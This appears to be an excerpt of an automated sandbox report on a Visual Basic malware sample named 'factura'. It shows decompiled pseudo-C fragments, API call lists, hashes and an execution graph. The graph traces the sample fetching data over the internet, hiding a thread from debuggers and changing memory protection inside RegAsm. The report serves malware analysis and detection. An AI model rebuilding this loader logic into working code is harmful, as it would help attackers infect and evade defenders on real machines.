        0x0040a84d
        0x0040a852
        0x0040a852
        0x0040a867
        0x0040a876
        0x0040a879
        0x0040a87b
        0x0040a882
        0x0040a89b
        0x0040a884
        0x0040a884
        0x0040a886
        0x0040a88b
        0x0040a88e
        0x0040a891
        0x0040a896
        0x0040a896
        0x0040a8a2
        0x0040a8b1
        0x0040a8b7
        0x0040a8b9
        0x0040a8c0
        0x0040a8dc
        0x0040a8c2
        0x0040a8c2
        0x0040a8c7
        0x0040a8cc
        0x0040a8cf
        0x0040a8d2
        0x0040a8d7
        0x0040a8d7
        0x0040a8e4
        0x0040a8eb
        0x0040a8fc
        0x0040a902
        0x0040a904
        0x0040a90b
        0x0040a927
        0x0040a90d
        0x0040a90d
        0x0040a912
        0x0040a917
        0x0040a91a
        0x0040a91d
        0x0040a922
        0x0040a922
        0x0040a92b
        0x0040a92e
        0x0040a930
        0x0040a937
        0x0040a93c
        0x0040a943
        0x0040a948
        0x0040a94e
        0x0040a95d
        0x0040a963
        0x0040a965
        0x0040a96c
        0x0040a988
        0x0040a96e
        0x0040a96e
        0x0040a973
        0x0040a978
        0x0040a97b
        0x0040a97e
        0x0040a983
        0x0040a983
        0x0040a96c
        0x0040a98c
        0x00000000

        APIs
        • __vbaChkstk.MSVBVM60(?,00401426), ref: 0040A816
        • __vbaNew2.MSVBVM60(004026E4,0040C33C,?,?,?,?,00401426), ref: 0040A84D
        • __vbaHresultCheckObj.MSVBVM60(00000000,?,004026D4,00000014), ref: 0040A891
        • __vbaHresultCheckObj.MSVBVM60(00000000,?,00402934,00000140), ref: 0040A8D2
        • __vbaFreeObj.MSVBVM60 ref: 0040A8EB
        • __vbaHresultCheckObj.MSVBVM60(00000000,004013D8,00402484,000000A8), ref: 0040A91D
        • __vbaStrCmp.MSVBVM60(00000000,?), ref: 0040A930
        • __vbaFreeStr.MSVBVM60(00000000,?), ref: 0040A943
        • __vbaHresultCheckObj.MSVBVM60(00000000,004013D8,00402484,0000015C), ref: 0040A97E
        Memory Dump Source
        • Source File: 00000000.00000002.1021604413.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
        • Associated: 00000000.00000002.1021596243.0000000000400000.00000002.00020000.sdmp Download File
        • Associated: 00000000.00000002.1021619032.000000000040C000.00000004.00020000.sdmp Download File
        • Associated: 00000000.00000002.1021628536.000000000040E000.00000002.00020000.sdmp Download File
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_0_2_400000_factura.jbxd
        Similarity
        • API ID: __vba$CheckHresult$Free$ChkstkNew2
        • String ID:
        • API String ID: 1969955383-0
        • Opcode ID: 536d1e14e713f835675f7ab7e8da9efe86fd684afa52689b549abdfa6a595ca8
        • Instruction ID: cadf4b2c4d296786da8d3df8a5b35fd9ed5db18fa00182bed9a9024f87c65372
        • Opcode Fuzzy Hash: 536d1e14e713f835675f7ab7e8da9efe86fd684afa52689b549abdfa6a595ca8
        • Instruction Fuzzy Hash: F5511271A00208EFCF01EFA5C889BDDBBB0BF18705F14842AF405BA2A0D7795895DF69
        Uniqueness

        Uniqueness Score: -1.00%

        C-Code - Quality: 44%
        			E0040981C(void* __ebx, void* __ecx, void* __edi, void* __esi) {
        				intOrPtr _v8;
        				intOrPtr _v12;
        				short _v24;
        				intOrPtr _v32;
        				char _v40;
        				void* _t9;
        				short _t10;
        				intOrPtr _t18;
        
        				_push(0x401426);
        				_push( *[fs:0x0]);
        				 *[fs:0x0] = _t18;
        				_t9 = 0x28;
        				L00401420();
        				_v12 = _t18;
        				_v8 = 0x4012e8;
        				_push(2);
        				_push("ABC");
        				_push(0x402954);
        				_push(0);
        				L00401564();
        				if(_t9 != 3) {
        					_push(L"Katakrese3");
        					_push(0x9b);
        					_push(0xffffffff);
        					_push(0x20);
        					L004015D6();
        				}
        				_v32 = 0x80020004;
        				_v40 = 0xa;
        				_t10 =  &_v40;
        				_push(_t10);
        				L0040155E();
        				_v24 = _t10;
        				L0040164E();
        				_push(E004098A8);
        				return _t10;
        			}











        0x00409821
        0x0040982c
        0x0040982d
        0x00409836
        0x00409837
        0x0040983f
        0x00409842
        0x00409849
        0x0040984b
        0x00409850
        0x00409855
        0x00409857
        0x0040985f
        0x00409861
        0x00409866
        0x0040986b
        0x0040986d
        0x0040986f
        0x0040986f
        0x00409874
        0x0040987b
        0x00409882
        0x00409885
        0x00409886
        0x0040988b
        0x00409892
        0x00409897
        0x00000000

        APIs
        • __vbaChkstk.MSVBVM60(?,00401426), ref: 00409837
        • __vbaInStr.MSVBVM60(00000000,00402954,ABC,00000002,?,?,?,?,00401426), ref: 00409857
        • __vbaFileOpen.MSVBVM60(00000020,000000FF,0000009B,Katakrese3,00000000,00402954,ABC,00000002,?,?,?,?,00401426), ref: 0040986F
        • #648.MSVBVM60(0000000A,00000000,00402954,ABC,00000002,?,?,?,?,00401426), ref: 00409886
        • __vbaFreeVar.MSVBVM60(0000000A,00000000,00402954,ABC,00000002,?,?,?,?,00401426), ref: 00409892
        Strings
        Memory Dump Source
        • Source File: 00000000.00000002.1021604413.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
        • Associated: 00000000.00000002.1021596243.0000000000400000.00000002.00020000.sdmp Download File
        • Associated: 00000000.00000002.1021619032.000000000040C000.00000004.00020000.sdmp Download File
        • Associated: 00000000.00000002.1021628536.000000000040E000.00000002.00020000.sdmp Download File
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_0_2_400000_factura.jbxd
        Similarity
        • API ID: __vba$#648ChkstkFileFreeOpen
        • String ID: ABC$Katakrese3
        • API String ID: 620541583-2512978052
        • Opcode ID: 7179c265118fd54e41a8289b0963a5da268af9174ecb6c5540ce8acfd95a7fcc
        • Instruction ID: 7c2ed1092784b21df74b8f55658112da2dc2d21b75212565eee53853e695481f
        • Opcode Fuzzy Hash: 7179c265118fd54e41a8289b0963a5da268af9174ecb6c5540ce8acfd95a7fcc
        • Instruction Fuzzy Hash: 3FF0A4B1A80308B7D710EB958E0BF9DBA68EB01B14F60452BF101761E1D6FD5D00876D
        Uniqueness

        Uniqueness Score: -1.00%

        C-Code - Quality: 66%
        			E0040A102(void* __ebx, void* __edi, void* __esi, intOrPtr* _a4) {
        				intOrPtr _v8;
        				intOrPtr _v12;
        				intOrPtr _v16;
        				void* _v28;
        				intOrPtr _v32;
        				intOrPtr _v36;
        				signed int _v40;
        				void* _v44;
        				intOrPtr* _v48;
        				signed int _v52;
        				intOrPtr* _v56;
        				signed int _v60;
        				intOrPtr _v72;
        				intOrPtr* _v76;
        				signed int _v80;
        				signed int _v84;
        				signed int _t55;
        				signed int _t60;
        				signed int _t61;
        				void* _t69;
        				void* _t71;
        				intOrPtr _t72;
        
        				_t72 = _t71 - 0xc;
        				 *[fs:0x0] = _t72;
        				L00401420();
        				_v16 = _t72;
        				_v12 = 0x401388;
        				_v8 = 0;
        				 *((intOrPtr*)( *_a4 + 4))(_a4, __edi, __esi, __ebx, 0x3c,  *[fs:0x0], 0x401426, _t69);
        				L004014F8();
        				if( *0x40c33c != 0) {
        					_v76 = 0x40c33c;
        				} else {
        					_push(0x40c33c);
        					_push(0x4026e4);
        					L0040165A();
        					_v76 = 0x40c33c;
        				}
        				_v48 =  *_v76;
        				_t55 =  *((intOrPtr*)( *_v48 + 0x14))(_v48,  &_v44);
        				asm("fclex");
        				_v52 = _t55;
        				if(_v52 >= 0) {
        					_v80 = _v80 & 0x00000000;
        				} else {
        					_push(0x14);
        					_push(0x4026d4);
        					_push(_v48);
        					_push(_v52);
        					L00401654();
        					_v80 = _t55;
        				}
        				_v56 = _v44;
        				_t60 =  *((intOrPtr*)( *_v56 + 0xd0))(_v56,  &_v40);
        				asm("fclex");
        				_v60 = _t60;
        				if(_v60 >= 0) {
        					_v84 = _v84 & 0x00000000;
        				} else {
        					_push(0xd0);
        					_push(0x402934);
        					_push(_v56);
        					_push(_v60);
        					L00401654();
        					_v84 = _t60;
        				}
        				_t61 = _v40;
        				_v72 = _t61;
        				_v40 = _v40 & 0x00000000;
        				L00401678();
        				L004015E8();
        				_v36 = 0xefe20c20;
        				_v32 = 0x5afb;
        				_push(E0040A239);
        				L0040166C();
        				return _t61;
        			}

























        0x0040a105
        0x0040a114
        0x0040a11e
        0x0040a126
        0x0040a129
        0x0040a130
        0x0040a13f
        0x0040a142
        0x0040a14e
        0x0040a168
        0x0040a150
        0x0040a150
        0x0040a155
        0x0040a15a
        0x0040a15f
        0x0040a15f
        0x0040a174
        0x0040a183
        0x0040a186
        0x0040a188
        0x0040a18f
        0x0040a1a8
        0x0040a191
        0x0040a191
        0x0040a193
        0x0040a198
        0x0040a19b
        0x0040a19e
        0x0040a1a3
        0x0040a1a3
        0x0040a1af
        0x0040a1be
        0x0040a1c4
        0x0040a1c6
        0x0040a1cd
        0x0040a1e9
        0x0040a1cf
        0x0040a1cf
        0x0040a1d4
        0x0040a1d9
        0x0040a1dc
        0x0040a1df
        0x0040a1e4
        0x0040a1e4
        0x0040a1ed
        0x0040a1f0
        0x0040a1f3
        0x0040a1fd
        0x0040a205
        0x0040a20a
        0x0040a211
        0x0040a218
        0x0040a233
        0x0040a238

        APIs
        • __vbaChkstk.MSVBVM60(?,00401426), ref: 0040A11E
        • #554.MSVBVM60(?,?,?,?,00401426), ref: 0040A142
        • __vbaNew2.MSVBVM60(004026E4,0040C33C,?,?,?,?,00401426), ref: 0040A15A
        • __vbaHresultCheckObj.MSVBVM60(00000000,?,004026D4,00000014), ref: 0040A19E
        • __vbaHresultCheckObj.MSVBVM60(00000000,?,00402934,000000D0), ref: 0040A1DF
        • __vbaStrMove.MSVBVM60(00000000,?,00402934,000000D0), ref: 0040A1FD
        • __vbaFreeObj.MSVBVM60(00000000,?,00402934,000000D0), ref: 0040A205
        • __vbaFreeStr.MSVBVM60(0040A239), ref: 0040A233
        Memory Dump Source
        • Source File: 00000000.00000002.1021604413.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
        • Associated: 00000000.00000002.1021596243.0000000000400000.00000002.00020000.sdmp Download File
        • Associated: 00000000.00000002.1021619032.000000000040C000.00000004.00020000.sdmp Download File
        • Associated: 00000000.00000002.1021628536.000000000040E000.00000002.00020000.sdmp Download File
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_0_2_400000_factura.jbxd
        Similarity
        • API ID: __vba$CheckFreeHresult$#554ChkstkMoveNew2
        • String ID:
        • API String ID: 787552733-0
        • Opcode ID: 2ed1c37450c66321c9424734d92535101f148a839997e76f0c384793f68f701b
        • Instruction ID: 8a106783a13c553a3dc7a81569b50320577885b547e7067d3a6b179f5e5a779c
        • Opcode Fuzzy Hash: 2ed1c37450c66321c9424734d92535101f148a839997e76f0c384793f68f701b
        • Instruction Fuzzy Hash: A331E070D00208EFDB00EFA5D989BDDBBB4AF18314F10816AE401BB2A0D7795955DFAA
        Uniqueness

        Uniqueness Score: -1.00%

        C-Code - Quality: 54%
        			E0040ACBA(signed int __eax, void* __ebx, void* __ecx, intOrPtr* __edi) {
        				void* _t20;
        				void* _t23;
        				void* _t27;
        				void* _t30;
        				void* _t31;
        
        				 *(_t31 + __eax * 2 - 0x73) =  *(_t31 + __eax * 2 - 0x73) << 0x45;
        				asm("in al, 0x89");
        				asm("lodsb");
        				 *0xc7 =  *0xc7 | 0x000000c7;
        				 *((intOrPtr*)(__ebx - 0x177c1fbb)) =  *((intOrPtr*)(__ebx - 0x177c1fbb)) + __ecx;
        				 *__edi =  *__edi + __ecx;
        				 *(__edi + 0x50000000) =  *(__edi + 0x50000000) ^ 0x0000008d;
        				_t30 = _t27 + 3;
        				asm("lodsb");
        				_push(0xc7);
        				_push(_t30 - 0x34);
        				L004014B6();
        				_t20 = _t30 - 0x34;
        				_push(_t20);
        				L004015B2();
        				_t23 = _t30 - 0x1c;
        				asm("in al, 0xe8");
        				 *((intOrPtr*)(_t23 - 1)) =  *((intOrPtr*)(_t23 - 1)) - 0xcc4d8dff;
        				L0040164E();
        				_push(E0040AD64);
        				L0040166C();
        				return _t20;
        			}








        0x0040acba
        0x0040acbf
        0x0040acc5
        0x0040acc6
        0x0040acc9
        0x0040accf
        0x0040acd1
        0x0040acd8
        0x0040acd9
        0x0040acda
        0x0040acde
        0x0040acdf
        0x0040ace4
        0x0040ace7
        0x0040ace8
        0x0040acef
        0x0040acf1
        0x0040acf3
        0x0040acfa
        0x0040ad39
        0x0040ad5e
        0x0040ad63

        APIs
        • #617.MSVBVM60(?,000000C7), ref: 0040ACDF
        • __vbaStrVarMove.MSVBVM60(?,?,000000C7), ref: 0040ACE8
        • __vbaStrMove.MSVBVM60(?,?,000000C7), ref: 0040ACF2
        • __vbaFreeVar.MSVBVM60(?,?,000000C7), ref: 0040ACFA
        • __vbaFreeStr.MSVBVM60(0040AD64,?,?,00004008,?), ref: 0040AD5E
        Strings
        Memory Dump Source
        • Source File: 00000000.00000002.1021604413.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
        • Associated: 00000000.00000002.1021596243.0000000000400000.00000002.00020000.sdmp Download File
        • Associated: 00000000.00000002.1021619032.000000000040C000.00000004.00020000.sdmp Download File
        • Associated: 00000000.00000002.1021628536.000000000040E000.00000002.00020000.sdmp Download File
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_0_2_400000_factura.jbxd
        Similarity
        • API ID: __vba$FreeMove$#617
        • String ID: E
        • API String ID: 501449635-3568589458
        • Opcode ID: 929917c894c969490b79ea6e7b976f73392685b115ad431e6a14597425a20043
        • Instruction ID: 9b5c172a01215c68d18dcd2bd0667265768ada3595a1460480cb69f3f4c1064b
        • Opcode Fuzzy Hash: 929917c894c969490b79ea6e7b976f73392685b115ad431e6a14597425a20043
        • Instruction Fuzzy Hash: CCF0BE6480934567C704E6B0D845EEEBBBA6F00308F78477BA092620E3EF3C2616C74A
        Uniqueness

        Uniqueness Score: -1.00%

        C-Code - Quality: 48%
        			E0040AD02(void* __ebx) {
        				void* _t12;
        
        				asm("in al, 0x89");
        				asm("lodsb");
        				 *0xc7 =  *0xc7 | 0x000000c7;
        				if(__ebx + __ebx != 0) {
        					asm("in al, 0xe8");
        					 *((intOrPtr*)(_t12 - 1)) =  *((intOrPtr*)(_t12 - 1)) - 0xcc4d8dff;
        					L0040164E();
        				} else {
        					_push(__ebp - 0x54);
        					_push(__ebp - 0x34);
        					L004014B6();
        					_push(__ebp - 0x34);
        					L004015B2();
        					L00401678();
        					L0040164E();
        				}
        				_push(E0040AD64);
        				L0040166C();
        				return 0xc7;
        			}




        0x0040ad03
        0x0040ad09
        0x0040ad0a
        0x0040ad0f
        0x0040acf1
        0x0040acf3
        0x0040acfa
        0x0040ad11
        0x0040ad14
        0x0040ad18
        0x0040ad19
        0x0040ad21
        0x0040ad22
        0x0040ad2c
        0x0040ad34
        0x0040ad34
        0x0040ad39
        0x0040ad5e
        0x0040ad63

        APIs
        • __vbaFreeVar.MSVBVM60(?,?,000000C7), ref: 0040ACFA
        • #617.MSVBVM60(?,00004008,?), ref: 0040AD19
        • __vbaStrVarMove.MSVBVM60(?,?,00004008,?), ref: 0040AD22
        • __vbaStrMove.MSVBVM60(?,?,00004008,?), ref: 0040AD2C
        • __vbaFreeVar.MSVBVM60(?,?,00004008,?), ref: 0040AD34
        • __vbaFreeStr.MSVBVM60(0040AD64,?,?,00004008,?), ref: 0040AD5E
        Memory Dump Source
        • Source File: 00000000.00000002.1021604413.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
        • Associated: 00000000.00000002.1021596243.0000000000400000.00000002.00020000.sdmp Download File
        • Associated: 00000000.00000002.1021619032.000000000040C000.00000004.00020000.sdmp Download File
        • Associated: 00000000.00000002.1021628536.000000000040E000.00000002.00020000.sdmp Download File
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_0_2_400000_factura.jbxd
        Similarity
        • API ID: __vba$Free$Move$#617
        • String ID:
        • API String ID: 3552338408-0
        • Opcode ID: 9d0c72816ea4e4e6e93de16860ba862567839bfabae52770dbd2a2e6c7ff2b0f
        • Instruction ID: f55d4adb1359f36abd4b8e94486312e99d48286980c8b0af80ae4aa256154519
        • Opcode Fuzzy Hash: 9d0c72816ea4e4e6e93de16860ba862567839bfabae52770dbd2a2e6c7ff2b0f
        • Instruction Fuzzy Hash: D6F082759002089BC700F7F1DD55CFDB379AE00304778463BA012764E2EE3E5A06874A
        Uniqueness

        Uniqueness Score: -1.00%

        Execution Graph

        Execution Coverage:9.6%
        Dynamic/Decrypted Code Coverage:0%
        Signature Coverage:31.3%
        Total number of Nodes:345
        Total number of Limit Nodes:1

        Graph

        execution_graph 1973 c01d40 1974 c01d52 1973->1974 1975 c001fe 1973->1975 1976 c001de 16 API calls 1975->1976 1977 c00203 1976->1977 1626 c01e02 InternetOpenA 1627 c01f72 1626->1627 1628 c01e1d 1626->1628 1630 c035c4 6 API calls 1627->1630 1629 c001fe 1628->1629 1645 c035c4 1628->1645 1647 c001de EnumWindows 1629->1647 1632 c01f82 1630->1632 1634 c01e62 1634->1627 1636 c01e6a InternetOpenUrlA 1634->1636 1635 c00203 1636->1627 1638 c01e93 1636->1638 1637 c035c4 6 API calls 1637->1638 1638->1627 1638->1629 1638->1637 1639 c01f1f 1638->1639 1639->1629 1640 c01f3c 1639->1640 1641 c035c4 6 API calls 1640->1641 1642 c01f48 1641->1642 1643 c035c4 6 API calls 1642->1643 1644 c01f5d 1643->1644 1665 c035c9 1645->1665 1648 c001f2 1647->1648 1649 c0021b 1647->1649 1652 c001de 14 API calls 1648->1652 1650 c02a2c 6 API calls 1649->1650 1651 c0022f 1650->1651 1653 c02a2c 6 API calls 1651->1653 1654 c00203 1652->1654 1655 c00248 1653->1655 1654->1635 1656 c02f5d 6 API calls 1655->1656 1657 c00275 1656->1657 1658 c02a2c 6 API calls 1657->1658 1659 c00291 NtSetInformationThread 1658->1659 1660 c02a2c 6 API calls 1659->1660 1661 c002bb 1660->1661 1662 c002f9 1661->1662 1735 c00315 1662->1735 1664 c02286 1664->1635 1666 c035ce 1665->1666 1666->1666 1675 c02e9c 1666->1675 1668 c036cc 1669 c035eb 1669->1668 1670 c03672 1669->1670 1671 c01416 1669->1671 1670->1668 1674 c036b8 InternetReadFile 1670->1674 1678 c02f5d 1671->1678 1673 c01430 1674->1668 1695 c02bee GetPEB 1675->1695 1677 c02eaf 1677->1669 1697 c02a2c 1678->1697 1680 c02f6a 1681 c02a2c 5 API calls 1680->1681 1682 c02f7d GetPEB 1681->1682 1709 c031b1 NtProtectVirtualMemory 1682->1709 1684 c030d7 1684->1673 1685 c030da 1689 c03152 1685->1689 1690 c03102 1685->1690 1686 c02fc1 1686->1684 1686->1685 1691 c0302f 1686->1691 1688 c031ac 1688->1673 1712 c031b1 NtProtectVirtualMemory 1689->1712 1711 c031b1 NtProtectVirtualMemory 1690->1711 1691->1691 1710 c031b1 NtProtectVirtualMemory 1691->1710 1694 c0314f 1694->1673 1696 c02c03 1695->1696 1696->1677 1698 c02a87 LoadLibraryA 1697->1698 1699 c02a38 1697->1699 1700 c02a92 1698->1700 1701 c02bee GetPEB 1699->1701 1700->1680 1713 c00fe2 1700->1713 1702 c02a46 1701->1702 1704 c02a69 1702->1704 1705 c02bee GetPEB 1702->1705 1704->1698 1707 c02a57 1705->1707 1707->1704 1708 c02bee GetPEB 1707->1708 1708->1704 1709->1686 1710->1684 1711->1694 1712->1688 1714 c01000 1713->1714 1714->1714 1715 c0100c GetPEB 1714->1715 1716 c01085 1715->1716 1717 c035c4 5 API calls 1716->1717 1718 c010ae 1717->1718 1719 c00f7f 1718->1719 1720 c035c4 5 API calls 1718->1720 1721 c00fe2 5 API calls 1719->1721 1723 c010d6 1720->1723 1722 c036f8 1721->1722 1727 c01142 1723->1727 1728 c01167 1727->1728 1729 c01142 6 API calls 1728->1729 1731 c01b1a 1729->1731 1730 c02e9c GetPEB 1730->1731 1731->1730 1732 c036f3 1731->1732 1733 c00fe2 6 API calls 1732->1733 1734 c036f8 1733->1734 1736 c02a2c 6 API calls 1735->1736 1737 c0032d 1736->1737 1738 c02a2c 6 API calls 1737->1738 1739 c00347 1738->1739 1740 c0040c 1739->1740 1771 c0198b 1739->1771 1786 c00387 1739->1786 1834 c01996 GetPEB 1740->1834 1743 c0042d 1746 c02a2c 6 API calls 1743->1746 1744 c02bee GetPEB 1745 c02da4 1744->1745 1747 c00448 1746->1747 1748 c035c4 6 API calls 1747->1748 1749 c0045f 1748->1749 1750 c02a2c 6 API calls 1749->1750 1759 c004ca 1749->1759 1752 c0048a 1750->1752 1751 c02a2c 6 API calls 1753 c0057a 1751->1753 1754 c035c4 6 API calls 1752->1754 1755 c02a2c 6 API calls 1753->1755 1754->1759 1756 c005b5 1755->1756 1757 c035c4 6 API calls 1756->1757 1758 c005dc 1757->1758 1758->1771 1835 c0290c 1758->1835 1759->1751 1759->1771 1771->1664 1771->1744 1789 c00356 1786->1789 1787 c02bee GetPEB 1788 c02da4 1787->1788 1789->1786 1790 c0040c 1789->1790 1792 c00387 12 API calls 1789->1792 1818 c0198b 1789->1818 1838 c01996 GetPEB 1790->1838 1792->1789 1793 c0042d 1794 c02a2c 6 API calls 1793->1794 1795 c00448 1794->1795 1796 c035c4 6 API calls 1795->1796 1797 c0045f 1796->1797 1798 c02a2c 6 API calls 1797->1798 1807 c004ca 1797->1807 1800 c0048a 1798->1800 1799 c02a2c 6 API calls 1801 c0057a 1799->1801 1802 c035c4 6 API calls 1800->1802 1803 c02a2c 6 API calls 1801->1803 1802->1807 1804 c005b5 1803->1804 1805 c035c4 6 API calls 1804->1805 1806 c005dc 1805->1806 1808 c0290c GetPEB 1806->1808 1806->1818 1807->1799 1807->1818 1809 c005f0 1808->1809 1810 c005f7 1809->1810 1811 c00619 1809->1811 1814 c0060f 1810->1814 1839 c01416 1810->1839 1821 c02f5d 6 API calls 1811->1821 1832 c006b4 1811->1832 1813 c029d0 1859 c006e4 1813->1859 1816 c035c4 6 API calls 1814->1816 1816->1818 1818->1739 1818->1787 1824 c00674 1821->1824 1842 c007ca 1824->1842 1832->1813 1832->1814 1834->1743 1891 c029bd GetPEB 1835->1891 1837 c02911 1838->1793 1840 c02f5d 6 API calls 1839->1840 1841 c01430 1840->1841 1843 c035c4 6 API calls 1842->1843 1844 c007f1 1843->1844 1845 c035c4 6 API calls 1844->1845 1846 c00810 1845->1846 1847 c035c4 6 API calls 1846->1847 1848 c00849 1847->1848 1849 c035c4 6 API calls 1848->1849 1850 c00686 1849->1850 1851 c00a37 1850->1851 1852 c035c4 6 API calls 1851->1852 1854 c00a5f 1852->1854 1853 c00add 1853->1832 1854->1853 1855 c035c4 6 API calls 1854->1855 1856 c00aa2 1855->1856 1857 c00ad0 1856->1857 1858 c035c4 6 API calls 1856->1858 1857->1832 1858->1857 1861 c00708 1859->1861 1862 c0073a 1861->1862 1863 c0076e Sleep 1861->1863 1865 c01d57 1861->1865 1862->1861 1869 c00ae8 1862->1869 1863->1861 1866 c02246 1865->1866 1867 c0224d LdrInitializeThunk 1866->1867 1868 c022b6 1866->1868 1867->1861 1867->1868 1870 c02a2c 6 API calls 1869->1870 1871 c00af9 1870->1871 1872 c035c4 6 API calls 1871->1872 1885 c00c49 1871->1885 1872->1871 1873 c02a2c 1874 c02a87 LoadLibraryA 1873->1874 1875 c02bee GetPEB 1873->1875 1886 c00f59 1874->1886 1876 c02a46 1875->1876 1878 c02a69 1876->1878 1879 c02bee GetPEB 1876->1879 1877 c00fe2 6 API calls 1880 c036f8 1877->1880 1878->1874 1881 c02a57 1879->1881 1881->1878 1883 c02bee GetPEB 1881->1883 1882 c00e3a 1884 c00e42 GetPEB 1882->1884 1883->1878 1887 c00e62 1884->1887 1885->1873 1885->1882 1886->1862 1886->1877 1887->1886 1888 c035c4 6 API calls 1887->1888 1889 c00f27 1887->1889 1888->1887 1890 c035c4 6 API calls 1889->1890 1890->1886 1891->1837 1954 c00da7 1958 c00cfe 1954->1958 1955 c02a2c 1956 c02a87 LoadLibraryA 1955->1956 1957 c02bee GetPEB 1955->1957 1968 c00f59 1956->1968 1959 c02a46 1957->1959 1958->1955 1963 c00e3a 1958->1963 1961 c02a69 1959->1961 1962 c02bee GetPEB 1959->1962 1960 c00fe2 6 API calls 1964 c036f8 1960->1964 1961->1956 1965 c02a57 1962->1965 1966 c00e42 GetPEB 1963->1966 1965->1961 1967 c02bee GetPEB 1965->1967 1969 c00e62 1966->1969 1967->1961 1968->1960 1969->1968 1970 c035c4 6 API calls 1969->1970 1971 c00f27 1969->1971 1970->1969 1972 c035c4 6 API calls 1971->1972 1972->1968 1986 c01a69 1988 c01a71 1986->1988 1989 c01aca 1988->1989 1990 c01acd 1988->1990 1991 c01ad2 1990->1991 1991->1990 1992 c02bee GetPEB 1991->1992 1994 c01af1 1991->1994 1993 c02da4 1992->1993 1994->1988 1913 c00eca 1914 c00e99 1913->1914 1915 c035c4 6 API calls 1914->1915 1916 c00f27 1914->1916 1915->1914 1917 c035c4 6 API calls 1916->1917 1918 c00f59 1917->1918 1919 c00fe2 6 API calls 1918->1919 1920 c036f8 1919->1920 1940 c036ec 1941 c036f3 1940->1941 1942 c00fe2 6 API calls 1941->1942 1943 c036f8 1942->1943 1921 c029cd 1922 c029d0 1921->1922 1923 c006e4 10 API calls 1922->1923 1924 c029d5 1923->1924 1925 c029f4 1924->1925 1926 c02bee GetPEB 1924->1926 1927 c029e2 1924->1927 1929 c02a87 LoadLibraryA 1925->1929 1932 c02a24 1925->1932 1926->1927 1927->1925 1928 c02bee GetPEB 1927->1928 1928->1925 1930 c02a92 1929->1930 1931 c00fe2 6 API calls 1930->1931 1933 c036f8 1931->1933 1995 c0106e 1996 c01071 1995->1996 1997 c010ae 1996->1997 1998 c035c4 6 API calls 1996->1998 1999 c00f7f 1997->1999 2000 c035c4 6 API calls 1997->2000 1998->1997 2001 c00fe2 6 API calls 1999->2001 2003 c010d6 2000->2003 2002 c036f8 2001->2002 2004 c01142 6 API calls 2003->2004 2006 c01b1a 2004->2006 2005 c02e9c GetPEB 2005->2006 2006->1999 2006->2005 2025 c01b0e 2026 c01b15 2025->2026 2027 c01142 6 API calls 2026->2027 2029 c01b1a 2027->2029 2028 c02e9c GetPEB 2028->2029 2029->2028 2030 c036f3 2029->2030 2031 c00fe2 6 API calls 2030->2031 2032 c036f8 2031->2032 1892 c01bb3 1897 c01bcd CreateFileA 1892->1897 1894 c01bba 1895 c02bee GetPEB 1894->1895 1896 c02da4 1895->1896 1897->1894 2052 c02d33 2054 c02cc6 2052->2054 2053 c02e11 2054->2053 2055 c02bee GetPEB 2054->2055 2056 c02da4 2055->2056 1934 c009d6 1935 c009e6 1934->1935 1936 c01d57 LdrInitializeThunk 1935->1936 1937 c00a0f 1936->1937 1938 c00a37 6 API calls 1937->1938 1939 c00a33 1938->1939 1898 c00219 1899 c0021b 1898->1899 1900 c02a2c 6 API calls 1899->1900 1901 c0022f 1900->1901 1902 c02a2c 6 API calls 1901->1902 1903 c00248 1902->1903 1904 c02f5d 6 API calls 1903->1904 1905 c00275 1904->1905 1906 c02a2c 6 API calls 1905->1906 1907 c00291 NtSetInformationThread 1906->1907 1908 c02a2c 6 API calls 1907->1908 1909 c002bb 1908->1909 1910 c002f9 1909->1910 1911 c00315 14 API calls 1910->1911 1912 c02286 1911->1912 2007 c02c7b 2008 c02a2c 6 API calls 2007->2008 2010 c02ca8 2008->2010 2009 c02e11 2010->2009 2011 c02bee GetPEB 2010->2011 2012 c02da4 2011->2012 1944 c0019d 1945 c02a2c 6 API calls 1944->1945 1946 c001b6 1945->1946 1949 c001c6 1946->1949 1948 c022b1 1948->1948 1950 c02a2c 6 API calls 1949->1950 1951 c001d5 1950->1951 1952 c001de 16 API calls 1951->1952 1953 c00203 1952->1953 1953->1948 1978 c00e5d 1981 c00e62 1978->1981 1979 c00f59 1980 c00fe2 6 API calls 1979->1980 1982 c036f8 1980->1982 1981->1979 1983 c035c4 6 API calls 1981->1983 1984 c00f27 1981->1984 1983->1981 1985 c035c4 6 API calls 1984->1985 1985->1979 2013 c0217d 2014 c02a2c 6 API calls 2013->2014 2015 c02191 2014->2015 2016 c02a2c 6 API calls 2015->2016 2017 c021ac 2016->2017 2020 c021b7 2017->2020 2019 c022a3 2021 c02a2c 6 API calls 2020->2021 2022 c021ce 2021->2022 2023 c02a2c 6 API calls 2022->2023 2024 c021de 2023->2024 2024->2019

        Executed Functions

        Control-flow Graph

        APIs
        • EnumWindows.USER32(00C00203,?,00000000,00C0244C,00C00A0F,?,00000000,?,00000050,00000369,?,00007EF9,00000079,?,00000000), ref: 00C001EA
        • NtSetInformationThread.NTDLL(000000FE,00000011,00000000,00000000,00000000,00000000,00000000,00000000,?,00000000,00000000), ref: 00C002A2
        Strings
        Memory Dump Source
        • Source File: 0000000F.00000002.1031687205.0000000000C00000.00000040.00000001.sdmp, Offset: 00C00000, based on PE: false
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_15_2_c00000_RegAsm.jbxd
        Yara matches
        Similarity
        • API ID: EnumInformationThreadWindows
        • String ID: 1.!T
        • API String ID: 1954852945-3147410236
        • Opcode ID: 8290a7d0ea485f84a71fc05ce66a317cbefedf250b441f37851246e1a8887803
        • Instruction ID: 55d17980e1577e334a2252a58ddd83e52119ef641849b2e599e37f30cf75b677
        • Opcode Fuzzy Hash: 8290a7d0ea485f84a71fc05ce66a317cbefedf250b441f37851246e1a8887803
        • Instruction Fuzzy Hash: 7031E4B0B40305AFEF21AF648C96BDD3792AF86364FA54216FD556B2C1CA34C846D741
        Uniqueness

        Uniqueness Score: -1.00%

        Control-flow Graph

        APIs
